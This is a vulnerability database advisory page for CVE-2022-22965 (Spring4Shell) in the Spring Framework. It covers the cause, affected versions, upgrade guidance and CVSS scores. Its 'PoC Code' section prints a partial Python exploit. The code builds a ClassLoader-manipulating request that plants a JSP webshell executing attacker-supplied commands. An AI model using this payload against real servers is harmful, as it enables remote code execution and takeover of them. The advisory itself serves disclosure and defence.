Vulnerabilities
Projects
Vulnerability Disclosure
About Us
Contact Us
Mend.io Vulnerability Database
What is a CVE vulnerability ID? 
What is a WS vulnerability ID?
What is an MSC vulnerability ID?
New vulnerability? Tell us about it!
What is a WS vulnerability ID?
What is an MSC vulnerability ID?
We found results for “”
CVE-2022-22965
Date: April 1, 2022
Overview
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.Details
The vulnerability in Spring Beans allows attackers under certain circumstances to achieve remote code execution (RCE). Current PoC related to the attack is done by creating a specially crafted request which manipulates ClassLoader to successfully achieve RCE.PoC Details
The vulnerability is caused due to wrongly exposure of the class object getCachedIntrospectionResults method of Spring framework when binding its parameters.The PoC code is sending POST request to the vulnerable application with specific headers and body that alters the Tomcat server’s logging properties via ClassLoader. The request leads to a creation of a jsp file, which in our case contains a malicious webshell code.Then the attacker execute the code by accessing the malicious jsp file in the following path - [server-ip]/[appname]/{filename}.jsp?cmd=[maliciouscommand].
PoC Code
post_headers = {"Content-Type": "application/x-www-form-urlencoded"}
get_headers = {"prefix": "<%", "suffix": "%>//", "c": "Runtime",}
# “"c": "Runtime" - This may seem strange, but this seems to be needed to bypass some check that looks for "Runtime" in the log_pattern
def run_exploit(url, directory, filename):
log_pattern =
"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20" \
f"java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter" \
f"(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B" \
f"%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di"
log_file_suffix = "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
log_file_dir = f"class.module.classLoader.resources.context.parent.pipeline.first.directory={directory}"
log_file_prefix = f"class.module.classLoader.resources.context.parent.pipeline.first.prefix={filename}"
log_file_date_format = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
exp_data = "&".join([log_pattern, log_file_suffix, log_file_dir, log_file_prefix, log_file_date_format])Affected Environments
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions.Prevention
The preferred response is to update to Spring Framework 5.3.18 and 5.2.20 or greater. However, some may be in a position where upgrading is not possible to do quickly. For these cases, please visit WhiteSource Spring4Shell blog, which can be found in the Resources section in this page.Language: Java
Good to know:
Upgrade Version
Upgrade to version org.springframework:spring-beans:5.2.20.RELEASE,5.3.18
| Base Score: |
|
|---|---|
| Attack Vector (AV): | Network |
| Attack Complexity (AC): | Low |
| Privileges Required (PR): | None |
| User Interaction (UI): | None |
| Scope (S): | Unchanged |
| Confidentiality (C): | High |
| Integrity (I): | High |
| Availability (A): | High |
| Base Score: |
|
|---|---|
| Access Vector (AV): | Network |
| Access Complexity (AC): | Low |
| Authentication (AU): | None |
| Confidentiality (C): | Partial |
| Integrity (I): | Partial |
| Availability (A): | Partial |
| Additional information: |